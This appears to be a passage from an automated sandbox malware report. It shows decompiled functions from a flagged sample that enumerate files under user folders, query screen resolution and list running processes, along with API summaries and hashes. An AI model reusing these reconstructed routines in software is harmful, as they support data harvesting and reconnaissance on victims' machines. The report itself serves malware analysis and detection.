				E0042083E(E004348F8, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t259 - 0x96c)) =  *((intOrPtr*)(_t259 + 8));
				_t115 = E00416617(__ebx, __edi, __esi, 0x1a);
				_t250 = 0xf;
				 *((intOrPtr*)(_t259 - 0x7ec)) = _t250;
				 *((intOrPtr*)(_t259 - 0x7f0)) = 0;
				 *((char*)(_t259 - 0x800)) = 0;
				E00404331(_t259 - 0x800, _t115);
				_t209 = 0x3e8;
				 *((intOrPtr*)(_t259 - 4)) = 0;
				_t240 = 0x3e8;
				_t117 = _t259 - 0x7e4;
				do {
					 *_t117 = 0;
					_t117 = _t117 + 1;
					_t240 = _t240 - 1;
				} while (_t240 != 0);
				_t118 = _t259 - 0x3fc;
				do {
					 *_t118 = 0;
					_t118 = _t118 + 1;
					_t209 = _t209 - 1;
					_t266 = _t209;
				} while (_t209 != 0);
				lstrcatA(_t259 - 0x7e4, E00416617(0, __edi, _t250, 0x1a));
				lstrcatA(_t259 - 0x7e4,  *0x445ddc);
				lstrcatA(_t259 - 0x7e4,  *0x445b0c);
				lstrcatA(_t259 - 0x3fc, E00416617(0, __edi, _t250, 0x1a));
				lstrcatA(_t259 - 0x3fc,  *0x445f58);
				lstrcatA(_t259 - 0x3fc, "*");
				_t261 = _t260 - 0x1c;
				_t212 = _t261;
				 *((intOrPtr*)(_t259 - 0x968)) = _t261;
				 *((intOrPtr*)(_t212 + 0x14)) = _t250;
				 *((intOrPtr*)(_t212 + 0x10)) = 0;
				 *_t212 = 0;
				E00404331(_t212, _t259 - 0x7e4);
				E004162AB(_t259 - 0x964, _t241, _t250, _t266);
				 *((char*)(_t259 - 4)) = 1;
				_t136 =  *((intOrPtr*)(_t259 - 0x960));
				_t204 =  *((intOrPtr*)(_t259 - 0x964));
				 *((intOrPtr*)(_t259 - 0x954)) = _t136;
				_t267 = _t204 - _t136;
				if(_t204 != _t136) {
					do {
						E0040D38B(_t259 - 0x81c, _t204);
						 *((char*)(_t259 - 4)) = 2;
						_t182 = E0041607C(_t259 - 0x81c, _t240, _t259 - 0x870);
						 *((char*)(_t259 - 4)) = 3;
						_push( *0x445ddc);
						_push(_t259 - 0x8a8);
						_t184 = E0040C233(_t204, _t259 - 0x800, _t182, _t267);
						 *((char*)(_t259 - 4)) = 4;
						_t186 = E004046CE(_t182, _t259 - 0x8e0);
						 *((char*)(_t259 - 4)) = 5;
						_t189 = E0041607C(_t259 - 0x81c, _t240, _t259 - 0x854);
						 *((char*)(_t259 - 4)) = 6;
						_t191 = E00404697(_t184, _t259 - 0x8c4,  *0x445c60, _t189);
						_t261 = _t261 + 0xc;
						 *((char*)(_t259 - 4)) = 7;
						if( *((intOrPtr*)(_t186 + 0x14)) < 0x10) {
						}
						if( *((intOrPtr*)(_t191 + 0x14)) >= 0x10) {
							_t191 =  *_t191;
						}
						E0041CEAD(_t191);
						E00404354(_t259 - 0x8c4, 1, 0);
						E00404354(_t259 - 0x854, 1, 0);
						E00404354(_t259 - 0x8e0, 1, 0);
						E00404354(_t259 - 0x8a8, 1, 0);
						E00404354(_t259 - 0x870, 1, 0);
						_t241 = 0;
						 *((char*)(_t259 - 4)) = 1;
						E0040C148(0, _t259 - 0x81c, 1);
						_t204 = _t204 + 0x1c;
						_t270 = _t204 -  *((intOrPtr*)(_t259 - 0x954));
					} while (_t204 !=  *((intOrPtr*)(_t259 - 0x954)));
					_t250 = 0xf;
				}
				_t262 = _t261 - 0x1c;
				_t213 = _t262;
				 *(_t213 + 0x10) =  *(_t213 + 0x10) & 0x00000000;
				 *((intOrPtr*)(_t259 - 0x968)) = _t262;
				 *((intOrPtr*)(_t213 + 0x14)) = _t250;
				 *_t213 = 0;
				E00404331(_t213, _t259 - 0x3fc);
				_t242 = E004162AB(_t259 - 0x97c, _t241, _t250, _t270);
				_t140 = _t259 - 0x964;
				if(_t140 == _t242) {
					_t206 = 0;
					__eflags = 0;
				} else {
					_t250 = _t140;
					E0040D44B(_t140);
					 *((intOrPtr*)(_t259 - 0x964)) =  *_t242;
					 *((intOrPtr*)(_t259 - 0x960)) =  *((intOrPtr*)(_t242 + 4));
					_t206 = 0;
					 *((intOrPtr*)(_t259 - 0x95c)) =  *((intOrPtr*)(_t242 + 8));
					 *_t242 = 0;
					 *((intOrPtr*)(_t242 + 4)) = 0;
					 *((intOrPtr*)(_t242 + 8)) = 0;
				}
				 *((char*)(_t259 - 4)) = 1;
				_t141 =  *((intOrPtr*)(_t259 - 0x97c));
				if( *((intOrPtr*)(_t259 - 0x97c)) != _t206) {
					E0040D51F(_t141,  *((intOrPtr*)(_t259 - 0x978)));
					_push( *((intOrPtr*)(_t259 - 0x97c)));
					E0041E1F1();
				}
				_t142 =  *((intOrPtr*)(_t259 - 0x960));
				_t214 =  *((intOrPtr*)(_t259 - 0x964));
				 *((intOrPtr*)(_t259 - 0x968)) = _t142;
				 *((intOrPtr*)(_t259 - 0x954)) = _t214;
				_t273 = _t214 - _t142;
				if(_t214 != _t142) {
					do {
						E0040D38B(_t259 - 0x838,  *((intOrPtr*)(_t259 - 0x954)));
						 *((char*)(_t259 - 4)) = 9;
						_t152 = E0041607C(_t259 - 0x838, _t240, _t259 - 0x934);
						 *((char*)(_t259 - 4)) = 0xa;
						_push( *0x445f58);
						_push(_t259 - 0x8fc);
						_t154 = E0040C233(_t206, _t259 - 0x800, _t152, _t273);
						 *((char*)(_t259 - 4)) = 0xb;
						_t156 = E004046CE(_t152, _t259 - 0x950);
						 *((char*)(_t259 - 4)) = 0xc;
						_t159 = E0041607C(_t259 - 0x838, _t240, _t259 - 0x918);
						 *((char*)(_t259 - 4)) = 0xd;
						_t161 = E00404697(_t154, _t259 - 0x88c,  *0x445cc4, _t159);
						_t262 = _t262 + 0xc;
						 *((char*)(_t259 - 4)) = 0xe;
						if( *((intOrPtr*)(_t156 + 0x14)) < 0x10) {
						}
						if( *((intOrPtr*)(_t161 + 0x14)) >= 0x10) {
							_t161 =  *_t161;
						}
						E0041CEAD(_t161);
						E00404354(_t259 - 0x88c, 1, _t206);
						E00404354(_t259 - 0x918, 1, _t206);
						E00404354(_t259 - 0x950, 1, _t206);
						E00404354(_t259 - 0x8fc, 1, _t206);
						E00404354(_t259 - 0x934, 1, _t206);
						_t242 = 0;
						_t250 = _t259 - 0x838;
						 *((char*)(_t259 - 4)) = 1;
						E0040C148(0, _t259 - 0x838, 1);
						 *((intOrPtr*)(_t259 - 0x954)) =  *((intOrPtr*)(_t259 - 0x954)) + 0x1c;
					} while ( *((intOrPtr*)(_t259 - 0x954)) !=  *((intOrPtr*)(_t259 - 0x968)));
				}
				_t143 =  *((intOrPtr*)(_t259 - 0x964));
				if( *((intOrPtr*)(_t259 - 0x964)) != _t206) {
					E0040D51F(_t143,  *((intOrPtr*)(_t259 - 0x960)));
					_push( *((intOrPtr*)(_t259 - 0x964)));
					E0041E1F1();
				}
				 *((intOrPtr*)(_t259 - 0x964)) = _t206;
				 *((intOrPtr*)(_t259 - 0x960)) = _t206;
				 *((intOrPtr*)(_t259 - 0x95c)) = _t206;
				E00404354(_t259 - 0x800, 1, _t206);
				return E00420888(_t206, _t242, _t250);
			}






























                                                                    0x00410cc2
                                                                    0x00410cc2
                                                                    0x00410ccc
                                                                    0x00410cd6
                                                                    0x00410cdc
                                                                    0x00410ce4
                                                                    0x00410cee
                                                                    0x00410cf4
                                                                    0x00410cfa
                                                                    0x00410d00
                                                                    0x00410d05
                                                                    0x00410d0a
                                                                    0x00410d0d
                                                                    0x00410d0f
                                                                    0x00410d15
                                                                    0x00410d15
                                                                    0x00410d17
                                                                    0x00410d18
                                                                    0x00410d18
                                                                    0x00410d1b
                                                                    0x00410d21
                                                                    0x00410d21
                                                                    0x00410d23
                                                                    0x00410d24
                                                                    0x00410d24
                                                                    0x00410d24
                                                                    0x00410d37
                                                                    0x00410d4a
                                                                    0x00410d5d
                                                                    0x00410d73
                                                                    0x00410d86
                                                                    0x00410d98
                                                                    0x00410d9e
                                                                    0x00410da1
                                                                    0x00410da9
                                                                    0x00410daf
                                                                    0x00410db2
                                                                    0x00410db6
                                                                    0x00410db8
                                                                    0x00410dc3
                                                                    0x00410dc8
                                                                    0x00410dcc
                                                                    0x00410dd2
                                                                    0x00410dd8
                                                                    0x00410dde
                                                                    0x00410de0
                                                                    0x00410de6
                                                                    0x00410ded
                                                                    0x00410dff
                                                                    0x00410e03
                                                                    0x00410e0a
                                                                    0x00410e0e
                                                                    0x00410e1a
                                                                    0x00410e21
                                                                    0x00410e32
                                                                    0x00410e36
                                                                    0x00410e4a
                                                                    0x00410e4e
                                                                    0x00410e54
                                                                    0x00410e65
                                                                    0x00410e6a
                                                                    0x00410e6d
                                                                    0x00410e75
                                                                    0x00410e75
                                                                    0x00410e81
                                                                    0x00410e83
                                                                    0x00410e83
                                                                    0x00410e8f
                                                                    0x00410ea2
                                                                    0x00410eaf
                                                                    0x00410ebc
                                                                    0x00410ec9
                                                                    0x00410ed6
                                                                    0x00410edc
                                                                    0x00410ee4
                                                                    0x00410ee8
                                                                    0x00410eed
                                                                    0x00410ef0
                                                                    0x00410ef0
                                                                    0x00410efe
                                                                    0x00410efe
                                                                    0x00410eff
                                                                    0x00410f02
                                                                    0x00410f04
                                                                    0x00410f0e
                                                                    0x00410f14
                                                                    0x00410f18
                                                                    0x00410f1b
                                                                    0x00410f2b
                                                                    0x00410f2d
                                                                    0x00410f35
                                                                    0x00410f64
                                                                    0x00410f64
                                                                    0x00410f37
                                                                    0x00410f37
                                                                    0x00410f39
                                                                    0x00410f40
                                                                    0x00410f49
                                                                    0x00410f52
                                                                    0x00410f54
                                                                    0x00410f5a
                                                                    0x00410f5c
                                                                    0x00410f5f
                                                                    0x00410f5f
                                                                    0x00410f66
                                                                    0x00410f6a
                                                                    0x00410f72
                                                                    0x00410f7a
                                                                    0x00410f7f
                                                                    0x00410f85
                                                                    0x00410f8a
                                                                    0x00410f8b
                                                                    0x00410f91
                                                                    0x00410f97
                                                                    0x00410f9d
                                                                    0x00410fa3
                                                                    0x00410fa5
                                                                    0x00410fab
                                                                    0x00410fb7
                                                                    0x00410fc9
                                                                    0x00410fcd
                                                                    0x00410fd4
                                                                    0x00410fd8
                                                                    0x00410fe4
                                                                    0x00410feb
                                                                    0x00410ffc
                                                                    0x00411000
                                                                    0x00411014
                                                                    0x00411018
                                                                    0x0041101e
                                                                    0x0041102f
                                                                    0x00411034
                                                                    0x00411037
                                                                    0x0041103f
                                                                    0x0041103f
                                                                    0x0041104b
                                                                    0x0041104d
                                                                    0x0041104d
                                                                    0x00411059
                                                                    0x0041106a
                                                                    0x00411077
                                                                    0x00411084
                                                                    0x00411091
                                                                    0x0041109e
                                                                    0x004110a4
                                                                    0x004110a6
                                                                    0x004110ac
                                                                    0x004110b0
                                                                    0x004110b5
                                                                    0x004110c2
                                                                    0x00410fab
                                                                    0x004110ce
                                                                    0x004110d6
                                                                    0x004110de
                                                                    0x004110e3
                                                                    0x004110e9
                                                                    0x004110ee
                                                                    0x004110f8
                                                                    0x004110fe
                                                                    0x00411104
                                                                    0x0041110a
                                                                    0x00411114

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00410CCC
                                                                      • Part of subcall function 00416617: _memset.LIBCMT ref: 00416638
                                                                      • Part of subcall function 00416617: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00416650
                                                                    • lstrcatA.KERNEL32(?,00000000,00000000,00000970,0041359F,?,?,?,?,?,?,?,?,?,?,?), ref: 00410D37
                                                                    • lstrcatA.KERNEL32(?), ref: 00410D4A
                                                                    • lstrcatA.KERNEL32(?), ref: 00410D5D
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00410D73
                                                                    • lstrcatA.KERNEL32(?), ref: 00410D86
                                                                    • lstrcatA.KERNEL32(?,0043EE4C), ref: 00410D98
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                      • Part of subcall function 0040C148: _memmove.LIBCMT ref: 0040C162
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$_memmove$FolderH_prolog3_Path_memset
                                                                    • String ID:
                                                                    • API String ID: 3670317503-0
                                                                    • Opcode ID: 24d7d41e8632c0084af0d35026e7b117cd4c615a86271df0a8c9d1665c220cab
                                                                    • Instruction ID: 0f7f5597d831c79fc4751f38d1cfc365ae307ced7288515f4b0a7b3771bf9554
                                                                    • Opcode Fuzzy Hash: 24d7d41e8632c0084af0d35026e7b117cd4c615a86271df0a8c9d1665c220cab
                                                                    • Instruction Fuzzy Hash: D2C190719012689FDB21EB65CC80BDDBBB8AF49304F1040EAE509A7192DA355FC8CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00415442 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 86%
                                                                    			E00415442(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				void* _t29;
				struct HDC__* _t41;
				void* _t52;
				void* _t54;
				void* _t57;
				void* _t61;

				_t61 = __eflags;
				_t52 = __edx;
				_push(0x7c);
				E0042083E(E0043472A, __ebx, __edi, __esi);
				_t54 = __ecx;
				 *((intOrPtr*)(_t57 - 0x88)) = 0;
				_t41 = CreateDCA("DISPLAY", 0, 0, 0);
				 *((intOrPtr*)(_t57 - 0x88)) = GetDeviceCaps(_t41, 8);
				 *((intOrPtr*)(_t57 - 0x84)) = GetDeviceCaps(_t41, 0xa);
				ReleaseDC(0, _t41);
				_push( *((intOrPtr*)(_t57 - 0x84)));
				 *((intOrPtr*)(_t57 - 0x84)) = E00415F45(_t41, _t57 - 0x80, _t52, _t54, 0, _t61);
				_push( *((intOrPtr*)(_t57 - 0x88)));
				_t46 = _t57 - 0x64;
				 *((intOrPtr*)(_t57 - 4)) = 0;
				_t27 = E00415F45(_t41, _t57 - 0x64, _t52, _t54, 0, _t61);
				 *((char*)(_t57 - 4)) = 1;
				_t29 = E00404697(_t57 - 0x64, _t57 - 0x48, 0x43c8d8, _t27);
				 *((char*)(_t57 - 4)) = 2;
				E0040C20F(_t46, _t57 - 0x2c, _t29, "x");
				 *((char*)(_t57 - 4)) = 3;
				E004046CE( *((intOrPtr*)(_t57 - 0x84)), _t54);
				E00404354(_t57 - 0x2c, 1, 0);
				E00404354(_t57 - 0x48, 1, 0);
				E00404354(_t57 - 0x64, 1, 0);
				E00404354(_t57 - 0x80, 1, 0);
				return E00420888(1, _t54, 0);
			}










                                                                    0x00415442
                                                                    0x00415442
                                                                    0x00415442
                                                                    0x00415449
                                                                    0x00415458
                                                                    0x0041545a
                                                                    0x00415466
                                                                    0x00415474
                                                                    0x00415482
                                                                    0x00415488
                                                                    0x0041548e
                                                                    0x0041549c
                                                                    0x004154a2
                                                                    0x004154a8
                                                                    0x004154ab
                                                                    0x004154ae
                                                                    0x004154c0
                                                                    0x004154c3
                                                                    0x004154d5
                                                                    0x004154d9
                                                                    0x004154e9
                                                                    0x004154ed
                                                                    0x004154f7
                                                                    0x00415501
                                                                    0x0041550b
                                                                    0x00415515
                                                                    0x00415521

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00415449
                                                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00415460
                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0041546B
                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041547A
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00415488
                                                                      • Part of subcall function 00415F45: __EH_prolog3_GS.LIBCMT ref: 00415F4F
                                                                      • Part of subcall function 00415F45: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00416052
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CapsDeviceH_prolog3_$CreateIos_base_dtorRelease_memmovestd::ios_base::_
                                                                    • String ID: DISPLAY
                                                                    • API String ID: 350445702-865373369
                                                                    • Opcode ID: 0e178147caafaac4e9b6ea204f87d0f2ae11ecc16876635c896d9428c979760a
                                                                    • Instruction ID: 210d82f3644b0323bf1a3b3590f00a491fe0f4a48142152e6f432a25fd100599
                                                                    • Opcode Fuzzy Hash: 0e178147caafaac4e9b6ea204f87d0f2ae11ecc16876635c896d9428c979760a
                                                                    • Instruction Fuzzy Hash: 682186B1D01118ABCB10EBA5CC89FDE7F78BF15344F14406AF509B2191EE380A49CB69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004163DF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00416420
                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,00000000), ref: 00416432
                                                                    • EnumProcessModules.PSAPI(00000000,?,00000004,?,?,00000000,00000000), ref: 00416449
                                                                    • GetModuleBaseNameA.PSAPI(00000000,?,?,00000104,?,00000000,00000000), ref: 00416460
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00416467
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$BaseCloseEnumHandleModuleModulesNameOpen_memset
                                                                    • String ID: <unknown>
                                                                    • API String ID: 601403599-1574992787
                                                                    • Opcode ID: ad1c87eeea8f6fa882f62f820d7b2cfb2fa607c7812577ba7cd2e72bbbb9155b
                                                                    • Instruction ID: f7858d53e1e8637c8a522bdb343f00f4add88303db9b965dbc866339f1100c32
                                                                    • Opcode Fuzzy Hash: ad1c87eeea8f6fa882f62f820d7b2cfb2fa607c7812577ba7cd2e72bbbb9155b
                                                                    • Instruction Fuzzy Hash: 52117272900618AFEB31DFA5DC45BDEB7B8BF09705F014029F914EB181D77496488F69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004208BF Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 64%
                                                                    			E004208BF(void* __ebx, void* __eflags, intOrPtr _a4) {
				void* _t9;
				char* _t11;
				char* _t12;
				void* _t16;
				signed int _t17;
				void* _t29;
				char* _t30;
				void* _t31;

				_push(__ebx);
				_t29 = E00425E8C(__ebx);
				if(_t29 != 0) {
					if( *(_t29 + 0x24) != 0) {
						L7:
						_t30 =  *(_t29 + 0x24);
						if(E0041E192(_t30, 0x86, E00420897(_a4)) != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_t9 = E004239B9();
							asm("int3");
							_push(_t30);
							_t31 = _t16;
							if(_t31 != 0 && _t9 != 0 && _t9 != _t31) {
								_push(0x86);
								_t17 = 0x36;
								 *(memcpy(_t9, _t31, _t17 << 2)) =  *_t10 & 0x00000000;
								_t9 = E00425A1C(_t10);
							}
							return _t9;
						} else {
							_t11 = _t30;
							goto L5;
						}
					} else {
						_t12 = E00422019(0x86, 1);
						_pop(_t16);
						 *(_t29 + 0x24) = _t12;
						if(_t12 != 0) {
							goto L7;
						} else {
							_t11 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
							L5:
							goto L6;
						}
					}
				} else {
					_t11 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
					L6:
					return _t11;
				}
			}











                                                                    0x004208c4
                                                                    0x004208cb
                                                                    0x004208d1
                                                                    0x004208e3
                                                                    0x00420900
                                                                    0x00420903
                                                                    0x00420918
                                                                    0x0042091e
                                                                    0x0042091f
                                                                    0x00420920
                                                                    0x00420921
                                                                    0x00420922
                                                                    0x00420923
                                                                    0x00420928
                                                                    0x0042092b
                                                                    0x0042092c
                                                                    0x00420930
                                                                    0x0042093a
                                                                    0x0042093d
                                                                    0x00420942
                                                                    0x00420946
                                                                    0x0042094c
                                                                    0x0042094e
                                                                    0x0042091a
                                                                    0x0042091a
                                                                    0x00000000
                                                                    0x0042091a
                                                                    0x004208e5
                                                                    0x004208e8
                                                                    0x004208ee
                                                                    0x004208ef
                                                                    0x004208f4
                                                                    0x00000000
                                                                    0x004208f6
                                                                    0x004208f6
                                                                    0x004208fb
                                                                    0x00000000
                                                                    0x004208fb
                                                                    0x004208f4
                                                                    0x004208d3
                                                                    0x004208d3
                                                                    0x004208fc
                                                                    0x004208ff
                                                                    0x004208ff

                                                                    APIs
                                                                    • __getptd_noexit.LIBCMT ref: 004208C6
                                                                      • Part of subcall function 00425E8C: GetLastError.KERNEL32(?,?,0042214C,0041DB6D,?,?,00403F3E,00000010), ref: 00425E90
                                                                      • Part of subcall function 00425E8C: ___set_flsgetvalue.LIBCMT ref: 00425E9E
                                                                      • Part of subcall function 00425E8C: __calloc_crt.LIBCMT ref: 00425EB2
                                                                      • Part of subcall function 00425E8C: DecodePointer.KERNEL32(00000000,?,?,0042214C,0041DB6D,?,?,00403F3E,00000010), ref: 00425ECC
                                                                      • Part of subcall function 00425E8C: GetCurrentThreadId.KERNEL32 ref: 00425EE2
                                                                      • Part of subcall function 00425E8C: SetLastError.KERNEL32(00000000,?,?,0042214C,0041DB6D,?,?,00403F3E,00000010), ref: 00425EFA
                                                                    • __calloc_crt.LIBCMT ref: 004208E8
                                                                    • __get_sys_err_msg.LIBCMT ref: 00420906
                                                                    • _strcpy_s.LIBCMT ref: 0042090E
                                                                    • __invoke_watson.LIBCMT ref: 00420923
                                                                    Strings
                                                                    • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004208D3, 004208F6
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
                                                                    • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                    • API String ID: 3117964792-798102604
                                                                    • Opcode ID: 1505c339cb015a9e1f4c8a70d905c504d02cc1fbbfa8d0de9dd9cb042d3b4ef2
                                                                    • Instruction ID: 85bafaffa843aaadd39f1fceae3c1a10cccce632f0278155b863be3590c65fc0
                                                                    • Opcode Fuzzy Hash: 1505c339cb015a9e1f4c8a70d905c504d02cc1fbbfa8d0de9dd9cb042d3b4ef2
                                                                    • Instruction Fuzzy Hash: 83F02B727002342BD720392A7C4196B75DDCB84718F90043FFA4A97203E9BD9C8142DD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00425DD8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 91%
                                                                    			E00425DD8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t26;
				intOrPtr _t30;
				intOrPtr _t39;
				void* _t40;

				_t31 = __ebx;
				_push(8);
				_push(0x440918);
				E00427300(__ebx, __edi, __esi);
				GetModuleHandleW(L"KERNEL32.DLL");
				_t39 =  *((intOrPtr*)(_t40 + 8));
				 *((intOrPtr*)(_t39 + 0x5c)) = 0x436c40;
				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
				 *((intOrPtr*)(_t39 + 0x14)) = 1;
				 *((intOrPtr*)(_t39 + 0x70)) = 1;
				 *((char*)(_t39 + 0xc8)) = 0x43;
				 *((char*)(_t39 + 0x14b)) = 0x43;
				 *(_t39 + 0x68) = 0x443690;
				E004279D9(__ebx, 1, 0xd);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				InterlockedIncrement( *(_t39 + 0x68));
				 *(_t40 - 4) = 0xfffffffe;
				E00425E7A();
				E004279D9(_t31, 1, 0xc);
				 *(_t40 - 4) = 1;
				_t26 =  *((intOrPtr*)(_t40 + 0xc));
				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
				if(_t26 == 0) {
					_t30 =  *0x443df8; // 0x4be11a0
					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
				}
				E00425A1C( *((intOrPtr*)(_t39 + 0x6c)));
				 *(_t40 - 4) = 0xfffffffe;
				return E00427345(E00425E83());
			}







                                                                    0x00425dd8
                                                                    0x00425dd8
                                                                    0x00425dda
                                                                    0x00425ddf
                                                                    0x00425de9
                                                                    0x00425def
                                                                    0x00425df2
                                                                    0x00425df9
                                                                    0x00425e00
                                                                    0x00425e03
                                                                    0x00425e06
                                                                    0x00425e0d
                                                                    0x00425e14
                                                                    0x00425e1d
                                                                    0x00425e23
                                                                    0x00425e2a
                                                                    0x00425e30
                                                                    0x00425e37
                                                                    0x00425e3e
                                                                    0x00425e44
                                                                    0x00425e47
                                                                    0x00425e4a
                                                                    0x00425e4f
                                                                    0x00425e51
                                                                    0x00425e56
                                                                    0x00425e56
                                                                    0x00425e5c
                                                                    0x00425e62
                                                                    0x00425e73

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00440918,00000008,00425EE0,00000000,00000000,?,?,0042214C,0041DB6D,?,?,00403F3E,00000010), ref: 00425DE9
                                                                    • __lock.LIBCMT ref: 00425E1D
                                                                      • Part of subcall function 004279D9: __mtinitlocknum.LIBCMT ref: 004279EF
                                                                      • Part of subcall function 004279D9: __amsg_exit.LIBCMT ref: 004279FB
                                                                      • Part of subcall function 004279D9: EnterCriticalSection.KERNEL32(?,?,?,00425E22,0000000D), ref: 00427A03
                                                                    • InterlockedIncrement.KERNEL32(00443690), ref: 00425E2A
                                                                    • __lock.LIBCMT ref: 00425E3E
                                                                    • ___addlocaleref.LIBCMT ref: 00425E5C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                    • String ID: KERNEL32.DLL
                                                                    • API String ID: 637971194-2576044830
                                                                    • Opcode ID: 2ecb6dcd75beeb6c8019aac2673cdf63fa8f73a530f68e8ec91cebba44c3e175
                                                                    • Instruction ID: e38cc65030100f2965e51e0687373edec994876024335d1bd1145aee33e093fc
                                                                    • Opcode Fuzzy Hash: 2ecb6dcd75beeb6c8019aac2673cdf63fa8f73a530f68e8ec91cebba44c3e175
                                                                    • Instruction Fuzzy Hash: DF01A571A04B11EFE720EF76E805309F7E0AF14325F10850FE896972A0CBB8A640DB58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040DF59 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 94%
                                                                    			E0040DF59(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t37;
				void* _t38;

				_t35 = __edi;
				_push(0xc);
				E004207D5(E00433849, __ebx, __edi, __esi);
				_t37 =  *((intOrPtr*)(_t38 + 8));
				E0041D5BD(_t37, 0);
				 *((intOrPtr*)(_t38 - 4)) = 0;
				 *((intOrPtr*)(_t37 + 4)) = 0;
				 *((char*)(_t37 + 8)) = 0;
				 *((intOrPtr*)(_t37 + 0xc)) = 0;
				 *((char*)(_t37 + 0x10)) = 0;
				 *((intOrPtr*)(_t37 + 0x14)) = 0;
				 *((char*)(_t37 + 0x18)) = 0;
				 *((intOrPtr*)(_t37 + 0x1c)) = 0;
				 *((char*)(_t37 + 0x20)) = 0;
				 *((char*)(_t38 - 4)) = 4;
				_t40 =  *(_t38 + 0xc);
				if( *(_t38 + 0xc) == 0) {
					 *(_t38 + 0xc) = "bad locale name";
					E0041DC00(_t38 - 0x18, _t38 + 0xc);
					 *((intOrPtr*)(_t38 - 0x18)) = 0x435218;
					E0041FF86(_t38 - 0x18, 0x440c68);
				}
				E0041D3E4(0, _t35, _t37, _t40, _t37,  *(_t38 + 0xc));
				return E00420874(_t37);
			}





                                                                    0x0040df59
                                                                    0x0040df59
                                                                    0x0040df60
                                                                    0x0040df65
                                                                    0x0040df6d
                                                                    0x0040df72
                                                                    0x0040df75
                                                                    0x0040df78
                                                                    0x0040df7b
                                                                    0x0040df7e
                                                                    0x0040df81
                                                                    0x0040df84
                                                                    0x0040df87
                                                                    0x0040df8a
                                                                    0x0040df8d
                                                                    0x0040df91
                                                                    0x0040df94
                                                                    0x0040df9d
                                                                    0x0040dfa4
                                                                    0x0040dfb2
                                                                    0x0040dfb9
                                                                    0x0040dfb9
                                                                    0x0040dfc2
                                                                    0x0040dfd0

                                                                    APIs
